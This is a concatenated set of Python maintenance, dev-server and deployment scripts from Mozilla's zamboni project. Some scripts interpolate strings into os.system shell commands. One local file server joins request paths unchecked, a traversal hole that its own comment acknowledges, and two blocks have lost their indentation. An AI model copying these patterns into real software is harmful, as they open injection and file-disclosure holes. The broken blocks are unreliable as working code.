# Read-only Analytics scope is all the reporting code needs.
FLOW = flow_from_clientsecrets(
    CLIENT_SECRETS,
    scope='https://www.googleapis.com/auth/analytics.readonly',
    message=MISSING_CLIENT_SECRETS_MESSAGE)

# Storage whose put() is a no-op: credentials are only printed, never
# persisted to disk.
s = Storage()
s.put = lambda *a, **kw: None
credentials = run(FLOW, s)

# Flatten the credentials object into plain strings suitable for pasting
# into the Django settings file.
bits = dict([(str(name), str(getattr(credentials, name))) for name in
             ('access_token', 'client_id', 'client_secret',
              'refresh_token', 'token_uri',
              'user_agent')])
bits['token_expiry'] = credentials.token_expiry.strftime(EXPIRY_FORMAT)
print 'GOOGLE_ANALYTICS_CREDENTIALS = ',
pprint.pprint(bits)
########NEW FILE########
__FILENAME__ = checkdev
import json
import requests
import os
import time
GH_URL = 'https://api.github.com/repos/mozilla/zamboni/commits/master'
DEV_URL = 'https://marketplace-dev.allizom.org/media/git-rev.txt'

messaged = False  # only nag about "-dev is behind" once per run


def alert(msg):
    # Growl desktop notification; requires growlnotify on $PATH (OS X).
    os.system('growlnotify --message "%s"' % msg)


alert('Watching -dev')
# Poll every 15s until the sha deployed on -dev matches GitHub master.
while True:
    r = requests.get(GH_URL)
    obj = json.loads(r.content)
    git_sha = obj['sha'][:7]
    r = requests.get(DEV_URL)
    dev_sha = r.content.strip()
    if git_sha == dev_sha:
        msg = '-dev is up to date\n%s - %s' % (obj['commit']['author']['name'],
                                               obj['commit']['message'])
        alert(msg)
        break
    else:
        if not messaged:
            alert('-dev is behind master\n%s...%s' % (git_sha, dev_sha))
            messaged = True
    time.sleep(15)
########NEW FILE########
__FILENAME__ = gen-cron
#!/usr/bin/env python
import os
from optparse import OptionParser
# The crontab template ships next to this script.
TEMPLATE = open(os.path.join(os.path.dirname(__file__), 'crontab.tpl')).read()


def main():
    """Render crontab.tpl with the deploy paths/user/interpreter and
    print the result to stdout."""
    parser = OptionParser()
    parser.add_option("-z", "--zamboni",
                      help="Location of zamboni (required)")
    parser.add_option("-u", "--user",
                      help=("Prefix cron with this user. "
                            "Only define for cron.d style crontabs"))
    parser.add_option("-p", "--python", default="/usr/bin/python2.6",
                      help="Python interpreter to use")
    parser.add_option("-d", "--deprecations", default=False,
                      help="Show deprecation warnings")
    (opts, args) = parser.parse_args()
    if not opts.zamboni:
        parser.error("-z must be defined")
    if not opts.deprecations:
        opts.python += ' -W ignore::DeprecationWarning'
    ctx = {'django': 'cd %s; %s manage.py' % (opts.zamboni, opts.python)}
    ctx['z_cron'] = '%s cron' % ctx['django']
    if opts.user:
        for k, v in ctx.iteritems():
            ctx[k] = '%s %s' % (opts.user, v)
    # Needs to stay below the opts.user injection.
    ctx['python'] = opts.python
    print TEMPLATE % ctx


if __name__ == "__main__":
    main()
########NEW FILE########
__FILENAME__ = css-add-line-breaks
#!/usr/bin/env/python
import os
import re
CSS_DIR = '../media/css'
# A rule block (open brace + one or more "prop: value;" lines) immediately
# followed by the next selector -- used to insert a blank line between them.
REGEX = re.compile('({\n(?:\s+[\w-]+: .*?;\n)+)(.*?{)', re.MULTILINE)


def get_css_filenames(css_dir=CSS_DIR):
    """Return paths of all Stylus/Less sources under *css_dir*.

    :param css_dir: root directory to walk; defaults to the project
        stylesheet tree so existing callers are unaffected.
    :return: list of file paths ending in .styl or .less.
    """
    filenames = []
    for root, dirs, files in os.walk(css_dir):
        for f in files:
            # endswith() accepts a tuple: one test covers both extensions.
            if f.endswith(('.styl', '.less')):
                filenames.append(os.path.join(root, f))
    return filenames
def add_linebreak_css(filename):
    """Rewrite *filename* in place, inserting a blank line between
    adjacent rules (module-level REGEX defines "adjacent").

    :param filename: path to a stylesheet opened read/write.
    """
    # 'with' guarantees the handle is closed even if the regex or the
    # write raises; the original leaked the file object.
    with open(filename, 'r+') as f:
        contents = f.read()
        f.seek(0)
        f.write(REGEX.sub(r'\1\n\2', contents))
        # Drop any trailing bytes if the new contents are shorter.
        f.truncate()
def run():
    """Apply the blank-line fix to every stylesheet found."""
    for path in get_css_filenames():
        add_linebreak_css(path)


if __name__ == '__main__':
    run()
########NEW FILE########
__FILENAME__ = run_locally
#!/usr/bin/env python
import os
if __name__ == '__main__':
    # Resolve the config file relative to this script so it works from
    # any working directory.
    cf = os.path.join(os.path.dirname(__file__), 'elasticsearch.yml')
    cf = os.path.abspath(cf)
    # -f keeps elasticsearch in the foreground.
    os.system('elasticsearch -f -D es.config=%s' % cf)
########NEW FILE########
__FILENAME__ = generate-mkt-cats
import amo
from addons.models import AddonCategory, Category, Webapp
def run():
    """
    Usage::

        python -B manage.py runscript scripts.generate-mkt-cats

    Create the standard Marketplace categories (idempotent via
    get_or_create) and attach a sample visible webapp to each newly
    created category.
    """
    cats = {
        'books-reference': 'Books & Reference',
        'business': 'Business',
        'education': 'Education',
        'entertainment-sports': 'Entertainment & Sports',
        'games': 'Games',
        'health-fitness': 'Health & Fitness',
        'lifestyle': 'Lifestyle',
        'music': 'Music',
        'news-weather': 'News & Weather',
        'photos-media': 'Photos & Media',
        'productivity': 'Productivity',
        'shopping': 'Shopping',
        'social': 'Social',
        'travel': 'Travel',
        'utilities': 'Utilities'
    }
    for slug, name in cats.iteritems():
        cat, created = Category.objects.get_or_create(type=amo.ADDON_WEBAPP,
                                                      slug=slug)
        if created:
            cat.name = name
            cat.save()
            print 'Created "%s" category' % name
            # Seed the fresh category with the first visible app (if any)
            # so it isn't empty.
            try:
                w = Webapp.objects.visible()[0]
            except IndexError:
                pass
            else:
                ac, created = AddonCategory.objects.get_or_create(category=cat,
                                                                  addon=w)
                if created:
                    print 'Added "%s" to "%s" category' % (w.name, name)
                w.save()
########NEW FILE########
__FILENAME__ = lesswatch
#!/usr/bin/env python
import os, time, sys, re
towatch = []   # every .less file polled for mtime changes
includes = {}  # imported file -> list of files that @import it


def say(s):
    """Print *s* prefixed with the current wall-clock time."""
    stamp = time.strftime('%X')
    # Single parenthesized argument: identical output under Python 2's
    # print statement and Python 3's print function.
    print('[%s] %s' % (stamp, s))
def render_list(files):
    """Compile each .less file in *files*, then recursively re-compile
    anything that @imports it (per the global `includes` map)."""
    for f in files:
        # Output name is "<path>.less.css", matching what the site links.
        os.system('lessc %s %s.css' % (f, f))
        if (f in includes):
            say('re-compiling %d dependencies' % len(includes[f]))
            render_list(includes[f])
    say('re-compiled %d files' % len(files))
def watch():
    """Poll every watched file's mtime twice a second, re-rendering any
    that changed.  Runs forever."""
    say('watching %d files...' % len(towatch))
    before = set([(f, os.stat(f).st_mtime) for f in towatch])
    while 1:
        after = set([(f, os.stat(f).st_mtime) for f in towatch])
        # A (file, mtime) pair present before but not after means the
        # file's mtime changed.
        changed = [f for (f, d) in before.difference(after)]
        if len(changed):
            render_list(changed)
        before = after
        time.sleep(.5)
# Build the watch list and the @import dependency map under ./media.
for root, dirs, files in os.walk('./media'):
    less = filter(lambda x: re.search('\.less$', x), files)
    less = [(root + '/' + f) for f in less]
    for f in less:
        # NOTE(review): the `post_file` alias appears unused, and the
        # file handle is never closed (relies on GC).
        body = post_file = open(f, 'r').read()
        m = re.search('@import \'([a-zA-Z0-9_-]+)\';', body)
        if m:
            # Record that `f` must be re-rendered when its import changes.
            k = root + '/' + m.group(1) + '.less'
            if not k in includes:
                includes[k] = []
            includes[k].append(f)
    if '.git' in dirs:
        dirs.remove('.git')
    towatch += less

watch()
########NEW FILE########
__FILENAME__ = check_wsgi
#!/usr/bin/python2.6
"""Makes sure mod_wsgi has been restarted after the last code push i.e,
mod_wsgi is fresher than the mtime on all *.py files in the application dir.
"""
from datetime import datetime
from optparse import OptionParser
import os
from subprocess import PIPE, Popen
import urllib2
def check_modwsgi(app_dir):
    """Nagios-style check: return 0 (OK) when mod_wsgi was (re)loaded
    after the newest .py file under *app_dir* was modified, else print a
    CRITICAL line and return 2."""
    find_ = Popen("find %s -name '*.py'" % app_dir, stdout=PIPE, shell=True).communicate()[0]
    py_files = find_.strip().split("\n")
    # (mtime, path) tuples compare mtime-first, so max() is the newest file.
    newest_mtime = max((os.stat(f).st_mtime, f) for f in py_files)
    # /services/loaded reports the timestamp the WSGI app was imported.
    req = urllib2.Request("http://localhost:81/z/services/loaded",
                          headers={'Host': 'addons.mozilla.org'})
    mod_wsgi = datetime.strptime(urllib2.urlopen(req).read().strip(), '%Y-%m-%d %H:%M:%S.%f')
    if mod_wsgi < datetime.fromtimestamp(newest_mtime[0]):
        print "CRITICAL: %s is newer than modwsgi (restart apache)" % newest_mtime[1]
        return 2
    else:
        print "OK: mod_wsgi is fresh"
        return 0


if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option('-d', '--app_dir',
                      help="directory of mod_wsgi app e.g., /data/amo_python/www/prod/zamboni")
    options, args = parser.parse_args()
    # Exit code doubles as the Nagios status.
    exit(check_modwsgi(options.app_dir))
########NEW FILE########
__FILENAME__ = serve_packaged_apps
#!/usr/bin/env python
"""
Script to serve packaged app mini-manifest and zip files to ease development.
Change directory to the root of your packaged app directory and execute this
script. For example:
$ cd ~/myapp
$ python ~/serve_packaged_apps.py
"""
import json
import logging
import optparse
import os
import re
import socket
from StringIO import StringIO
from sys import exc_info
from traceback import format_tb
from wsgiref import simple_server
from zipfile import ZipFile, ZIP_DEFLATED
DEFAULT_ADDR = '0.0.0.0'
DEFAULT_PORT = '8888'
ROOT = os.getcwd()
NAME = os.path.basename(ROOT)
log = logging.getLogger(__name__)
def _absolutify(path):
return '%s%s/%s' % (os.environ['BASE_URL'], NAME, path.rsplit('/', 1)[0])
def _get_local_ip():
    """A hack to find the local IP without extra libraries.

    connect() on a datagram socket sends nothing; it only selects the
    local interface that would route toward the target.
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    probe.connect(('google.com', 80))
    local_ip = probe.getsockname()[0]
    probe.close()
    return local_ip
def index(environ, start_response):
    """WSGI view: landing page linking the mini-manifest and the zip,
    with an Install button wired to navigator.mozApps.installPackage.

    Doubled braces in the template escape literal CSS braces for
    str.format().
    """
    template = '''
    <!DOCTYPE html>
    <html>
      <head>
        <title>{name} - Packaged App Server</title>
        <style>
          button {{
            font-size: 18px;
            padding: 5px;
            width: 100%;
          }}
        </style>
      </head>
      <body>
        <p><a href="{manifest}">{manifest}</a>: The mini-manifest is what
          is provided to the <code>installPackage</code> API and provides
          information about your app to Firefox OS.</p>
        <p><a href="{package}">{package}</a>: The zipped-on-the-fly path to
          your packaged app. The mini-manifest points to this URL inside the
          mini-manifest.</p>
        <button onclick="{install}('{manifest}');">Install</button>
      </body>
    </html>
    '''
    context = {
        'name': NAME,
        'install': 'navigator.mozApps.installPackage',
        'manifest': _absolutify('manifest.webapp'),
        'package': _absolutify('package.zip'),
    }
    start_response('200 OK', [('Content-Type', 'text/html')])
    return [template.format(**context)]
def manifest(environ, start_response):
    """WSGI view: serve the mini-manifest as JSON."""
    payload = json.dumps({
        'name': u'My app',
        'version': 1,
        'size': 1000,  # TODO
        'package_path': _absolutify('package.zip'),
    })
    start_response('200 OK', [('Content-Type', 'application/json')])
    return [payload]
def zip_file(environ, start_response):
    """WSGI view: zip the whole app directory on the fly and serve it.

    Walks ROOT (module-level: the working directory at startup) and
    returns one ZIP archive containing every file under it.
    """
    def _add_file(zf, name, path):
        # Binary mode: package contents (images etc.) must not be
        # newline/codec mangled; the original opened in text mode.
        with open(path, 'rb') as fh:
            zf.writestr(name, fh.read())

    sio = StringIO()
    with ZipFile(file=sio, mode='w', compression=ZIP_DEFLATED) as outfile:
        for path, dirs, files in os.walk(ROOT):
            for f in files:
                full_path = os.path.join(path, f)
                zip_path = full_path[len(ROOT) + 1:]  # +1 for the slash.
                _add_file(outfile, zip_path, full_path)

    start_response('200 OK', [('Content-Type', 'application/zip')])
    # PEP 3333: return an iterable of bytestrings.  The original returned
    # the raw string, which servers iterate one byte at a time.
    return [sio.getvalue()]
# Routing URLs.
URLS = [
(r'^$', index), # Index points to these other URLs.
(r'manifest.webapp$', manifest), # The mini-manifest.
(r'package.zip$', zip_file), # The zipped package.
]
def application(environ, start_response):
    """Tiny WSGI router: dispatch PATH_INFO against the URLS table."""
    path = environ.get('PATH_INFO', '').lstrip('/')
    for pattern, handler in URLS:
        found = re.search(pattern, path)
        if found is not None:
            # Expose captured groups to the handler, then delegate.
            environ['myapp.url_args'] = found.groups()
            return handler(environ, start_response)
    # If no URLs match, 404.
    start_response('404 NOT FOUND', [('Content-Type', 'text/plain')])
    return ['Not Found']
class ExceptionMiddleware(object):
    """Exception middleware to catch errors and show a useful traceback.

    __call__ is a generator so it can stream the wrapped app's output and
    still emit a rendered traceback mid-stream on failure.
    """

    def __init__(self, app):
        # The wrapped WSGI application.
        self.app = app

    def __call__(self, environ, start_response):
        appiter = None
        # Call the application sending the output back unchanged. Catch any
        # exceptions that occur.
        try:
            appiter = self.app(environ, start_response)
            for item in appiter:
                yield item
        # If an exception occours we get the exception information and prepare
        # a traceback we can render.
        # NOTE(review): bare except also swallows KeyboardInterrupt /
        # SystemExit -- tolerable for a dev-only server.
        except:
            e_type, e_value, tb = exc_info()
            traceback = ['Traceback (most recent call last):']
            traceback += format_tb(tb)
            traceback.append('%s: %s' % (e_type.__name__, e_value))
            # We may or may have not started a response.
            try:
                start_response('500 INTERNAL SERVER ERROR', [('Content-Type',
                                                              'text/plain')])
            except:
                # Headers already sent: just append the traceback to the body.
                pass
            yield '\n'.join(traceback)
        # Give the wrapped app a chance to release resources.
        if hasattr(appiter, 'close'):
            appiter.close()
if __name__ == '__main__':
    p = optparse.OptionParser(usage='%prog\n\n' + __doc__)
    p.add_option('--addr',
                 default=DEFAULT_ADDR,
                 help='Address to serve at. Default: %s' % DEFAULT_ADDR)
    p.add_option('--port',
                 default=DEFAULT_PORT,
                 help='Port to run server on. Default: %s' % DEFAULT_PORT,
                 type=int)
    (options, args) = p.parse_args()
    logging.basicConfig(level=logging.DEBUG,
                        format='[%(asctime)s] %(message)s')
    # When bound to all interfaces, advertise a routable IP in BASE_URL
    # so a device on the network can reach the mini-manifest.
    ip = _get_local_ip() if options.addr == DEFAULT_ADDR else options.addr
    base_url = 'http://%s:%s/' % (ip, options.port)
    log.info('Serving at %s' % base_url)
    # _absolutify() reads BASE_URL from the environment.
    os.environ['BASE_URL'] = base_url
    application = ExceptionMiddleware(application)
    server = simple_server.make_server(options.addr, options.port, application)
    server.serve_forever()
########NEW FILE########
__FILENAME__ = serve_webapps
#!/usr/bin/env python
"""Serves .webapp/.json manifest files from the working directory."""
import logging
import optparse
import os
from wsgiref import simple_server
log = logging.getLogger(__name__)

# Files are served relative to the directory the script was launched in.
document_root = os.getcwd()


def fileapp(environ, start_response):
    """WSGI app: directory listings plus raw file serving.

    Manifest files (.webapp/.json) get the app-manifest content type;
    everything else is served as text/html.

    NOTE(review): PATH_INFO is joined to document_root unchecked, so a
    crafted '..' path can escape the root -- acceptable for a local dev
    helper, not for anything internet-facing.
    """
    path_info = environ['PATH_INFO']
    if path_info.startswith('/'):
        path_info = path_info[1:]  # make relative
    full_path = os.path.join(document_root, path_info)
    content_type = 'text/html'
    if full_path == '':
        full_path = '.'  # must be working dir
    if path_info == "" or path_info.endswith('/') or os.path.isdir(full_path):
        # Directory listing: one link per non-hidden entry.
        out = ['<html><head></head><body><ul>']
        for filename in os.listdir(full_path):
            if filename.startswith('.'):
                continue
            if os.path.isdir(os.path.join(full_path, filename)):
                filename = filename + '/'
            out.append('<li><a href="%s">%s</a></li>' % (filename, filename))
        out.append("</ul></body></html>")
        body = "".join(out)
    else:
        # 'with' closes the handle; the original leaked it on every hit.
        with open(full_path, 'r') as f:
            body = f.read()  # optimized for small files :)
        if full_path.endswith('.webapp') or full_path.endswith('.json'):
            content_type = 'application/x-web-app-manifest+json'
    start_response('200 OK', [('Content-Type', content_type),
                              ('Content-Length', str(len(body)))])
    return [body]
def main():
    """Parse options, configure logging, and serve the working directory
    forever via wsgiref's simple server."""
    p = optparse.OptionParser(usage="%prog\n\n" + __doc__)
    p.add_option("--addr", help="Address to serve at. Default: localhost",
                 default='')
    p.add_option("--port", help="Port to run server on. Default: %default",
                 default=8090, type=int)
    (options, args) = p.parse_args()
    logging.basicConfig(level=logging.DEBUG,
                        format='[%(asctime)s] %(message)s')
    log.info("starting webserver at http://%s:%s/"
             % (options.addr or 'localhost', options.port))
    httpd = simple_server.WSGIServer((options.addr, options.port),
                                     simple_server.WSGIRequestHandler)
    httpd.set_app(fileapp)
    httpd.serve_forever()


if __name__ == '__main__':
    main()
########NEW FILE########
__FILENAME__ = siege
"""
A script for generating siege files with a bunch of URL variations.
"""
import re
import sys
# Matches {placeholder} names inside a URL template.
part_re = re.compile(r'\{([-\w]+)\}')

AMO_LANGUAGES = (
    'af', 'ar', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es', 'eu', 'fa', 'fi',
    'fr', 'ga-IE', 'he', 'hu', 'id', 'it', 'ja', 'ko', 'mn', 'nl', 'pl',
    'pt-BR', 'pt-PT', 'ro', 'ru', 'sk', 'sq', 'sr', 'sv-SE', 'uk', 'vi',
    'zh-CN', 'zh-TW',
)

# Possible values for each {placeholder} used by the templates below.
config = {
    'base': [],
    'locale': AMO_LANGUAGES,
    'app': ['firefox'],
    'extension-slug': [''] + """
        alerts-and-updates appearance bookmarks download-management
        feeds-news-blogging language-support photos-music-videos
        privacy-security social-communication tabs toolbars web-development
        other""".split(),
    'theme-slug': [''] + """
        animals compact large miscellaneous modern nature os-integration retro
        sports""".split(),
    'theme-sort': 'name updated created downloads rating'.split(),
    'page': '1 2'.split(),
    'exp': 'on off'.split(),
    'personas-slug': [''] + """
        abstract causes fashion firefox foxkeh holiday music nature other
        scenery seasonal solid sports websites""".split(),
    'personas-sort': """up-and-coming created popular rating""".split()
}

# Common prefix shared by every template.
root = '{base}/{locale}/{app}'

templates = t = {
    'root': '/',
    'extensions': '/extensions/{extension-slug}/',
    'language-tools': '/language-tools',
    'themes': '/themes/{theme-slug}?sort={theme-sort}&page={page}',
    'personas': '/personas/{personas-slug}',
}

# Derived templates reuse the base ones with extra query parameters.
t['themes-unreviewed'] = t['themes'] + '&unreviewed={exp}'
t['personas-sort'] = t['personas'] + '?sort={personas-sort}'
t['extensions-sort'] = t['extensions'] + '?sort={theme-sort}'
t['extensions-featured'] = t['extensions'] + 'featured'

# Prepend the common root to every template in place.
for key, value in templates.items():
    templates[key] = root + value
def combos(s, parts):
    """Expand template *s* over every combination of values that the
    module-level `config` dict holds for the placeholder names in
    *parts*.  Returns the list of formatted strings."""
    def expand(remaining, bound):
        key = remaining[0]
        tail = remaining[1:]
        results = []
        for choice in config[key]:
            # `bound` is reused across the recursion; each key is
            # overwritten before it is read, so sharing is safe.
            bound[key] = choice
            if tail:
                results.extend(expand(tail, bound))
            else:
                results.append(s.format(**bound))
        return results
    return expand(parts, {})
def gen(choices=templates):
    """Expand each template in *choices* (default: all of them) into the
    full list of URL variants."""
    urls = []
    for template in choices:
        placeholders = part_re.findall(template)
        urls.extend(combos(template, placeholders))
    return urls
def main():
    """CLI entry point: print the expanded URL list for the chosen
    template names (all templates when none are given)."""
    args = sys.argv
    try:
        base, choices = sys.argv[1], args[2:] or templates.keys()
    except IndexError:
        print 'Usage: python siege.py <BASE> [%s]' % (', '.join(templates))
        print '\nBASE should be something like "http://localhost:8000/z".'
        print 'The remaining arguments are names of url templates.'
        sys.exit(1)
    # Normalize the base URL so templates don't produce '//'.
    config['base'] = [base.rstrip('/')]
    print '\n'.join(gen(templates[k] for k in choices))


if __name__ == '__main__':
    main()
########NEW FILE########
__FILENAME__ = update
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from commander.deploy import hostgroups, task
import commander_settings as settings
# Helper to build paths inside the deployed source checkout.
_src_dir = lambda *p: os.path.join(settings.SRC_DIR, *p)

# The virtualenv lives alongside (not inside) the source directory.
VIRTUALENV = os.path.join(os.path.dirname(settings.SRC_DIR), 'venv')
@task
def create_virtualenv(ctx):
    """Rebuild the deploy virtualenv, but only when the requirements
    files changed in the revision range just pulled."""
    with ctx.lcd(settings.SRC_DIR):
        # Diff the previous HEAD against the new one to see what changed.
        status = ctx.local('git diff HEAD@{1} HEAD --name-only')
        if 'requirements/' in status.out:
            venv = VIRTUALENV
            # Guard against rm -rf'ing a path outside the deploy root.
            if not venv.startswith('/data'):
                raise Exception('venv must start with /data')
            ctx.local('rm -rf %s' % venv)
            ctx.local('virtualenv --distribute --never-download %s' % venv)
            ctx.local('%s/bin/pip install --exists-action=w --no-deps --no-index '
                      '--download-cache=/tmp/pip-cache -f %s '
                      '-r %s/requirements/prod.txt' %
                      (venv, settings.PYREPO, settings.SRC_DIR))
            if getattr(settings, 'LOAD_TESTING', False):
                ctx.local('%s/bin/pip install --exists-action=w --no-deps '
                          '--no-index --download-cache=/tmp/pip-cache -f %s '
                          '-r %s/requirements/load.txt' %
                          (venv, settings.PYREPO, settings.SRC_DIR))
            # make sure this always runs
            ctx.local("rm -f %s/lib/python2.6/no-global-site-packages.txt" % venv)
            ctx.local("%s/bin/python /usr/bin/virtualenv --relocatable %s" %
                      (venv, venv))
@task
def update_locales(ctx):
    """Refresh the SVN-managed locale files and compile the .mo catalogs."""
    with ctx.lcd(_src_dir("locale")):
        # Throw away any local edits so the update cannot conflict.
        ctx.local("svn revert -R .")
        ctx.local("svn up")
        ctx.local("./compile-mo.sh .")
@task
def loadtest(ctx, repo=''):
    """Kick off a marteau load test, if this environment configures one."""
    if hasattr(settings, 'MARTEAU'):
        # Credentials are passed via the environment, not the command line.
        os.environ['MACAUTH_USER'] = settings.MARTEAU_USER
        os.environ['MACAUTH_SECRET'] = settings.MARTEAU_SECRET
        ctx.local('%s %s --server %s' % (settings.MARTEAU, repo,
                                         settings.MARTEAU_SERVER))
@task
def update_products(ctx):
    """Pull the latest Mozilla product-details data."""
    with ctx.lcd(settings.SRC_DIR):
        ctx.local('%s manage.py update_product_details' % settings.PYTHON)
@task
def compress_assets(ctx, arg=''):
    """Build the minified static assets; *arg* appends extra manage.py flags."""
    with ctx.lcd(settings.SRC_DIR):
        ctx.local("%s manage.py compress_assets -t %s" % (settings.PYTHON,
                                                          arg))
@task
def schematic(ctx):
    """Apply any outstanding database migrations via schematic."""
    with ctx.lcd(settings.SRC_DIR):
        ctx.local("%s %s/bin/schematic migrations" %
                  (settings.PYTHON, VIRTUALENV))
@task
def update_code(ctx, ref='origin/master'):
    """Hard-reset the checkout (and all submodules) to *ref*."""
    with ctx.lcd(settings.SRC_DIR):
        ctx.local("git fetch && git fetch -t")
        ctx.local("git reset --hard %s" % ref)
        ctx.local("git submodule sync")
        ctx.local("git submodule update --init --recursive")
        # Recursively run submodule sync/update to get all the right repo URLs.
        ctx.local("git submodule foreach 'git submodule sync --quiet'")
        ctx.local("git submodule foreach "
                  "'git submodule update --init --recursive'")
@task
def update_info(ctx, ref='origin/master'):
    """Log the checkout state and record the deployed revision for the app."""
    with ctx.lcd(settings.SRC_DIR):
        ctx.local("git status")
        ctx.local("git log -1")
        ctx.local("/bin/bash -c "
                  "'source /etc/bash_completion.d/git && __git_ps1'")
        # media/git-rev.txt is written so the deployed SHA can be inspected.
        ctx.local('git show -s {0} --pretty="format:%h" '
                  '> media/git-rev.txt'.format(ref))
@task
def checkin_changes(ctx):
    """Hand the updated checkout to the deploy script for distribution."""
    ctx.local(settings.DEPLOY_SCRIPT)
@task
def disable_cron(ctx):
    """Remove the crontab so no jobs can start mid-deploy."""
    ctx.local("rm -f /etc/cron.d/%s" % settings.CRON_NAME)
@task
def install_cron(ctx):
    """Regenerate the crontab and install it atomically."""
    with ctx.lcd(settings.SRC_DIR):
        ctx.local('%s ./scripts/crontab/gen-cron.py '
                  '-z %s -u apache -p %s > /etc/cron.d/.%s' %
                  (settings.PYTHON, settings.SRC_DIR,
                   settings.PYTHON, settings.CRON_NAME))
        # Write to a dot-file first, then mv: cron never sees a half file.
        ctx.local('mv /etc/cron.d/.%s /etc/cron.d/%s' % (settings.CRON_NAME,
                                                         settings.CRON_NAME))
@hostgroups(settings.WEB_HOSTGROUP,
            remote_kwargs={'ssh_key': settings.SSH_KEY})
def sync_code(ctx):
    """Run the remote update script on every web host."""
    ctx.remote(settings.REMOTE_UPDATE_SCRIPT)
@hostgroups(settings.WEB_HOSTGROUP,
            remote_kwargs={'ssh_key': settings.SSH_KEY})
def restart_workers(ctx):
    """Gracefully restart every gunicorn service on the web hosts."""
    for gservice in settings.GUNICORN:
        ctx.remote("/sbin/service %s graceful" % gservice)
    # Multi-instance services run as paired -a/-b units.
    for gservice in getattr(settings, 'MULTI_GUNICORN', []):
        ctx.remote("/sbin/service %s-a graceful" % gservice)
        ctx.remote("/sbin/service %s-b graceful" % gservice)
@task
def deploy_app(ctx):
    """Push code to the web hosts, then bounce their workers."""
    sync_code()
    restart_workers()
@hostgroups(settings.CELERY_HOSTGROUP,
            remote_kwargs={'ssh_key': settings.SSH_KEY})
def update_celery(ctx):
    """Push updated code to the celery hosts and restart their services.

    Each configured prefix owns three services: the main worker plus the
    devhub and priority queues; all three are restarted, AMO prefix first,
    then the marketplace prefix — same order as before the refactor.
    """
    ctx.remote(settings.REMOTE_UPDATE_SCRIPT)
    for prefix in (getattr(settings, 'CELERY_SERVICE_PREFIX', False),
                   getattr(settings, 'CELERY_SERVICE_MKT_PREFIX', False)):
        # A prefix that is unset/falsy means this environment does not run
        # that family of services.
        if prefix:
            ctx.remote("/sbin/service %s restart" % prefix)
            ctx.remote("/sbin/service %s-devhub restart" % prefix)
            ctx.remote("/sbin/service %s-priority restart" % prefix)
@task
def deploy(ctx):
    """Top-level deploy: cron, code push, web + celery restarts, cleanup."""
    install_cron()
    checkin_changes()
    deploy_app()
    update_celery()
    with ctx.lcd(settings.SRC_DIR):
        ctx.local('%s manage.py cron cleanup_validation_results' %
                  settings.PYTHON)
@task
def pre_update(ctx, ref=settings.UPDATE_REF):
    """First deploy phase: stop cron, then fetch and record the new code.

    NOTE: the default *ref* is captured once, at import time.
    """
    ctx.local('date')
    disable_cron()
    update_code(ref)
    update_info(ref)
@task
def update(ctx):
    """Second deploy phase: rebuild env, locales, assets and DB schema."""
    create_virtualenv()
    update_locales()
    update_products()
    # Compress twice: once for AMO, once for the Marketplace settings.
    compress_assets()
    compress_assets(arg='--settings=settings_local_mkt')
    schematic()
    with ctx.lcd(settings.SRC_DIR):
        ctx.local('%s manage.py dump_apps' % settings.PYTHON)
        ctx.local('%s manage.py statsd_ping --key=update' % settings.PYTHON)
########NEW FILE########
__FILENAME__ = xpitool
#!/usr/bin/env python
import optparse
import os
import subprocess
def main():
    """Extract an .xpi into a directory, or zip a directory back into one."""
    p = optparse.OptionParser(
        usage='%prog [options] [-x addon-1.0.xpi] [-c /path/to/addon-1.0/]')
    p.add_option('-x', '--extract',
                 help='Extracts xpi into current directory',
                 action='store_true')
    p.add_option('-c', '--recreate',
                 help='Zips an extracted xpi into current directory',
                 action='store_true')
    (options, args) = p.parse_args()
    if len(args) != 1:
        p.error("Incorrect usage")
    addon = os.path.abspath(args[0])
    if options.extract:
        # Unzip into a directory named after the xpi, minus the extension.
        d = os.path.splitext(addon)[0]
        os.mkdir(d)
        os.chdir(d)
        subprocess.check_call(['unzip', addon])
        print "Extracted to %s" % d
    elif options.recreate:
        xpi = "%s.xpi" % addon
        if os.path.exists(xpi):
            p.error("Refusing to overwrite %r" % xpi)
        # Zip from inside the directory so archive paths are relative.
        os.chdir(addon)
        subprocess.check_call(['zip', '-r', xpi] + os.listdir(os.getcwd()))
        print "Created %s" % xpi
    else:
        p.error("Incorrect usage")
if __name__ == '__main__':
    main()
########NEW FILE########
__FILENAME__ = utils
import dictconfig
import logging
import os
# get the right settings module
settingmodule = os.environ.get('DJANGO_SETTINGS_MODULE', 'settings_local')
# Strip the leading package name (it varies by checkout location) so the
# bare settings module can be imported directly below.
if settingmodule.startswith(('zamboni',  # typical git clone destination
                             'workspace',  # Jenkins
                             'project',  # vagrant VM
                             'freddo')):
    settingmodule = settingmodule.split('.', 1)[1]
import sys
import MySQLdb as mysql
import sqlalchemy.pool as pool
from django.utils import importlib
settings = importlib.import_module(settingmodule)
from constants.payments import (CONTRIB_CHARGEBACK, CONTRIB_NO_CHARGE,
CONTRIB_PURCHASE, CONTRIB_REFUND)
from lib.log_settings_base import formatters, handlers
def getconn():
    """Open a fresh MySQL connection to the services database."""
    db = settings.SERVICES_DATABASE
    return mysql.connect(host=db['HOST'], user=db['USER'],
                         passwd=db['PASSWORD'], db=db['NAME'])
# Shared SQLAlchemy connection pool; connections recycled every 300s
# (presumably to dodge idle-connection timeouts — confirm against DB config).
mypool = pool.QueuePool(getconn, max_overflow=10, pool_size=5, recycle=300)
def log_configure():
    """You have to call this to explicitly configure logging."""
    cfg = {
        'version': 1,
        'filters': {},
        # Reuse the shared formatter/handler definitions from
        # lib.log_settings_base; everything under 'z' goes to syslog.
        'formatters': dict(prod=formatters['prod']),
        'handlers': dict(syslog=handlers['syslog']),
        'loggers': {
            'z': {'handlers': ['syslog'], 'level': logging.INFO},
        },
        'root': {},
        # Since this configuration is applied at import time
        # in verify.py we don't want it to clobber other logs
        # when imported into the marketplace Django app.
        'disable_existing_loggers': False,
    }
    dictconfig.dictConfig(cfg)
def log_exception(data):
    """Log the exception currently being handled, with *data* for context.

    Uses Logger.exception(), so the active traceback is attached to the
    record.
    """
    exc_type, exc_value, _ = sys.exc_info()
    receipt_log = logging.getLogger('z.receipt')
    receipt_log.exception(u'Type: %s, %s. Data: %s' % (exc_type, exc_value,
                                                       data))
def log_info(msg):
    """Record *msg* at INFO level on the receipt logger."""
    logging.getLogger('z.receipt').info(msg)
########NEW FILE########
__FILENAME__ = verify
import calendar
import json
from datetime import datetime
from time import gmtime, time
from urlparse import parse_qsl, urlparse
